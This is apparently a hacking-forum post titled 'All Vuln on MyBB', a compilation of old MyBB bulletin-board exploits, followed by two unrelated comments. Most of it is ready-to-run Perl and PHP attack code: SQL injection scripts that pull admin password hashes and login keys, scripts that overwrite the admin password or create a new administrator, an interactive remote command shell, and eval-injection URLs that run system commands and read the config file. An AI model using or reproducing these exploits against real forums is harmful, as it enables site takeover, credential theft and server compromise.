Parse error: syntax error, unexpected ''', expecting ']' in
C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1

Problematic is exactly same piece of code, as in previous case:

eval("\$orderarrow['$sortby'] = \"".
$templates->get("forumdisplay_orderarrow")."\";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be
used by attacker to complete takeover the website and possible total
compromise of webserver.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Download MyBB new version 1.2.11 as soon as possible!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.janekvind.com/
Waraxe forum:  http://www.waraxe.us/forums.html

---------------------------------- [ EOF ] ------------------------------------

# MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit

#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) **
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
   exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit

# mybb is dead /str0ke

#!/usr/bin/perl
######################################################################################
#                              Crouz.Com Security Team                               #
######################################################################################
#    EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability             #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius)                                #
#Email: Alpha_Programmer@LinuxMail.ORG                                               #
#                                                                                    #
#This Xpl Change Admin's Pass For L0gin With P0wer User                              #
#                                                                                    #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln      #
#                                                                                    #
######################################################################################
# GR33tz T0 ==>  mh_p0rtal  --  Dr-CephaleX  --  The-Cephexin  -- Djay_Agoustinno    #
#               No_Face_King --  Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
#                                                                                    #
#   Special Lamerz : Hoormazd  &  imm02tal    ++ xshabgardx                        #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
**
  print "\n==========================================\n";
  print " \n     -- Exploit By Alpha Programmer(sirius) --\n\n";
  print "              Crouz Security Team      \n\n";
  print "         Usage: <T4rg3t> <DIR>\n\n";
  print "==========================================\n\n";
  print "Examples:\n\n";
  print "    Mybb.pl www.Site.com /mybb/ \n";
  exit();

}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) ** die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";
print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);
print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy \n\n";

# MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit

#!/bin/env perl
#//-------------------------------------------------------------#
#//     MyBB Forum SQL Injection Exploit .. By HACKERS PAL      #
#//     Greets For Devil-00 - Abducter - Almaster - GaCkeR      #
#//   Special Greets For SG (SecurityGurus) Team And Members    #
#//                    http://WwW.SoQoR.NeT                     #
#//-------------------------------------------------------------#

use LWP::Simple;
print "\n#####################################################";
print "\n#        MyBB Forum Exploit By : HACKERS PAL        #";
print "\n#               Http://WwW.SoQoR.NeT                #";
if(!$ARGV[0] or !$ARGV[1]) **
    print "\n# -- Usage:                                         #";
    print "\n# -- perl $0 [Full-Path] [User ID]             #";
    print "\n# -- Example:                                       #";
    print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
    exit(0);
}
else
**
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
    $web=$ARGV[0];
    $id=$ARGV[1];
    $url = "showteam.php?GLOBALS[]=1&comma=/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/FROM (.*)users u WHERE/;
    $prefix=$1;
    if(!$1)
    **
        $prefix="mybb_";
    }
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    print "\n[+] Table Prefix is : $prefix";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
    print "\n[-] Unable to retrieve User Name\n" if(!$1);
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
    die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
    print"\n[!] Watch out ... The Cookie Value is comming\n";
    $url =
    "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
    print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection

MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

$buddies = $mybb->user['buddylist'];

    $namesarray = explode(",",$buddies);

    if(is_array($namesarray))

    **

        while(list($key, $buddyid) = each($namesarray))

        **

            $sql .= "$comma'$buddyid'"; <== HERE  Uncleard Var !!

            $comma = ",";

        }

    $timecut = time() - $mybb->settings['wolcutoff'];

    $query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");

From 255 to 265

The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies 

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
    name    => "comma"
    value   => "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.

# MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit

#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you *****!
#
# - First you need to create the special user to do this use:
#   ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok,
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
#   for debugging.
# - After you have created the exploit or if you have a valid non common
#   user, you can execute shell commands.
#
# TIPS:
#   * Sometimes you have to change the thread Id, --tid is your friend 
#   * Don't forget to change the email. You MUST activate the account.
#   * Mejor karate aun dentro ti.
#
# LIMITATIONS:
#   * If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($*****,$*****_user,$*****_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'        => \$host,
  'dir=s'         => \$dir,
  '*****=s'           => \$*****,
  '*****_user=s'      => \$*****_user,
  '*****_pass=s'      => \$*****_pass,
  'debug'             => \$debug,
  '1'             => \$first_time,
  'tid=s'         => \$tid,
  'delete'        => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) **
    $host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> ** file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->*****(['http'] => $*****) if $*****;
$req->*****_authorization_basic($*****_user, $*****_pass) if $*****_user;

create_user() if $first_time;

while () **
        login() if !$logged;

        print "mybibi> "; # lost connection
        while(<STDIN>) **
                $command=$_;
                chomp($command);
                last;
        }
        &send($command);
}

sub send  **
    chomp (my $cmd = shift);
    my $h = $host.$dir."/newthread.php";
    my $req = POST $h, [
        'subject' => '514',
        'message' => '/slap 514',
        'previewpost' => 'Preview Post',
        'action' => 'do_newthread',
        'fid' => $tid,
        'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
    ];
    $req->header($uservar => $cmd);
    print $req->as_string() if $debug;
    my $res = $ua->request($req);
    if ($res->content =~ /You may not post in this/) **
        print "[!] don't have perms to post. Change the Forum ID\n";
    } else **
        my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
        print $data;
    }

}
sub login **
    my $h  = $host.$dir."/member.php";
    my $req = POST $h,[
        'username' => $username,
        'password' => $password,
        'submit' => 'Login',
        'action' => 'do_login'
    ];
    my $res = $ua->request($req);
    if ($res->content =~ /You have successfully been logged/is) **
        print "[*] Login succesful!\n";
        $logged = 1;
    } else **
        print "[!] Error login-in\n";
    }
}

sub help **
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--***** (http), --*****_user, --*****_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user **
    # firs we need to get the img.
    my  $h = $host.$dir."/member.php";
    print "Host: $h\n";

    $req = HTTP::Request->new (GET => $h."?action=register");
    $res = $ua->request ($req);

    my $req = POST $h, [
        'action' => "register",
        'agree' => "I Agree"
    ];
    print $req->as_string() if $debug;
    $res = $ua->request($req);

    my $content = $res->content();
    $content =~ m/.*(image\.php\?action.*?)\".*/is;
    my $img = $1;
    my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
    $res = $ua->request ($req);
    print $req->as_string();

    if ($res->content) **
        open (TMP, ">/tmp/file.png") or die($!);
        print TMP $res->content;
        close (TMP);
        print "[*] /tmp/file.png created.\n";
    }

    my ($hash) = $img =~ m/hash=(.*?)$/;
    my $img_str = get_img_str();
    unlink ("/tmp/file.png");
    $img_str =~ s/\n//g;
    my $req = POST $h, [
        'username' => $username,
        'password' => $password,
        'password2' => $password,
        'email' => $email,
        'email2' => $email,
        'imagestring' => $img_str,
        'imagehash' => $hash,
        'allownotices' => 'yes',
        'receivepms' => 'yes',
        'pmpopup' => 'no',
        'action' => "do_register",
        'regsubmit' => "Submit Registration"
    ];
    $res = $ua->request($req);
    print $req->as_string() if $debug;

    open (OUT, ">mybibi_out.html");
    print OUT $res->content;

    print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
**
    print "\nNow I need the text shown in /tmp/file.png: ";
    my $str = <STDIN>;
    return $str;
}
exit 0;

# MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit

#!/usr/bin/perl
# MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit
#
# www.h4ckerz.com / hackerz.ir / aria-security.net / Myimei.com /
# ./2006-6-23
### Coded By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;

 print q(
 ###########################################################
 # MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);



 if (@ARGV < 3) **
 print " #  usage : hx.pl [host&path] [uname] [pass]\n";
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n";
  exit();
 }

    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'member.php',
 Content => [
 "action"   => "do_login",
 "username"   => "$uname",
 "password"   => "$passwd",
 "submit"      => "Login",
 ],);

 if($cookie_jar->as_string =~ /mybbuser=(.*?);/) **
  print "successfully .\n";
  } else **
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n";
  exit();
  }

$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) **
print " [+] You Are Admin Now !!";
} else **
    print " [-] Exploit Failed !";
    }

# MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) **
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to MyBB\n";
echo "Options:\n";
echo "   -T[prefix]   specify a table prefix different from default (mybb_)\n";
echo "   -u[number]   specify a user id other than 1 (usually admin)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a *****\n";
echo "   -d:          disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
die;
}
/* software site: http://www.mybboard.com/

   vulnerable code in inc/functions.php near lines 1292-1320:

   ...
   function getip() **
    global $_SERVER;
    if($_SERVER['HTTP_X_FORWARDED_FOR'])
    **
        if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
        **
            while(list($key, $val) = each($addresses[0]))
            **
                if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
                **
                    $ip = $val;
                    break;
                }
            }
        }
    }
    if(!$ip)
    **
        if($_SERVER['HTTP_CLIENT_IP'])
        **
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        }
        else
        **
            $ip = $_SERVER['REMOTE_ADDR'];
        }
    }
    return $ip;
}
...

you can spoof your ip address through the CLIENT-IP http header...
as result you can inject sql statements in class_session.php at lines 36-68:
by calling the main index.php script
...
function init()
    **
        global $ipaddress, $db, $mybb, $noonline;
        //
        // Get our visitors IP
        //
        $this->ipaddress = $ipaddress = getip();

        //
        // User-agent
        //
        $this->useragent = $_SERVER['HTTP_USER_AGENT'];
        if(strlen($this->useragent) > 100)
        **
            $this->useragent = substr($this->useragent, 0, 100);
        }

        //
        // Attempt to find a session id in the cookies
        //
        if($_COOKIE['sid'])
        **
            $this->sid = addslashes($_COOKIE['sid']);
        }
        else
        **
            $this->sid = 0;
        }

        //
        // Attempt to load the session from the database
        //
        $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
...

injection is blind, but you can ask true-false questions to the database to
retrieve the admin loginkey.
Through that you can build an admin cookie and create a new admin user through
the admin/users.php script.
Also you can disclose table prefix.

--------------------------------------------------------------------------------


-*****************************************************************************-
*                                                                            *
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto    *
* grazie Grosso!                                                             *
*                                                                            *
-*****************************************************************************-
 */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
**
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  **
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   **$result.="  .";}
   else
   **$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   **$exa.=" ".dechex(ord($string[$i]));}
   else
   **$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) **$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$*****_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\';
function sendpacketii($packet)
**
  global $*****, $host, $port, $html, $*****_regex;
  if ($***'') **
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) **
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else **
   $c = preg_match($*****_regex,$*****);
    if (!$c) **
      echo 'Not a valid *****...';die;
    }
    $parts=explode(':',$*****);
    echo "Connecting to ".$parts[0].":".$parts[1]." *****...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) **
      echo 'No response from *****...';die;
   }
  }
  fputs($ock,$packet);
  if ($***'') **
    $html='';
    while (!feof($ock)) **
      $html.=fgets($ock);
    }
  }
  else **
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) **
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
**
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}
srand(make_seed());
$anumber = rand(1,99999);

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mybb_";
$user_id="1";//admin
$*****="";
$dt=0;
for ($i=3; $i<$argc; $i++)**
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
**
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
**
  $*****=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
**
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
**
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-d")
**
  $dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($***'') **$p=$path;} else **$p='http://'.$host.':'.$port.$path;}

if ($dt)
**
$sql="'suntzuuuu/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html))
**
 $temp=explode("sessions",$html);
 $temp2=explode(" ",$temp[0]);
 $prefix=$temp2[count($temp2)-1];
 echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
}
else
**
echo "unable to disclose table prefix...\n";
}
sleep(1);
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(65,90));//A-Z letters
$chars=array_merge($chars,range(97,122));//a-f letters
$j=1;
$loginkey="";
while (!strstr($loginkey,chr(0)))
**
for ($i=0; $i<=255; $i++)
**
if (in_array($i,$chars))
**
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("Hello There",$html)) **$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
}
if ($i==255) {die("Exploit failed...");}
}
  $j++;
}
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
echo "admin cookie -> ".$cookie."\r\n";


$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="action";

do_add
-----------------------------7d62702f250530
Content-Disposition: form-data; name="userusername";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="newpassword";

suntzu'.$anumber.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";

suntzoi@suntzu.org
-----------------------------7d62702f250530
Content-Disposition: form-data; name="usergroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="additionalgroups[]";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="displaygroup";

4
-----------------------------7d62702f250530
Content-Disposition: form-data; name="Add User";

  Add User
-----------------------------7d62702f250530--
';

$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("The user has successfully been added",$html))
**
  echo "exploit succeeded... now login as admin\n";
  echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
}
else
**
  echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
}
?>

src: Th3 0uTl4wS r3Fug3 -

jasminee · September 4, 2017

Before performing any upgrade please remember to backup your forum’s files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again (if necessary) once the upgrade is complete.

To upgrade, follow the Upgrading process. The upgrade script is required. There are changes to 9 language files and 9 templates were changed or added.

Edited September 4, 2017 by jasminee

DustyDelan · May 6, 2019

I just like the helpful info you provide to your articles. I'll bookmark your blog and test again right here regularly. I am somewhat certain I'll be informed plenty of new stuff proper here! Good luck for the next!

Sign In

All Vuln on MyBB !

Recommended Posts

Guest expl0iter

Link to comment

Share on other sites

jasminee

Link to comment

Share on other sites

DustyDelan

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages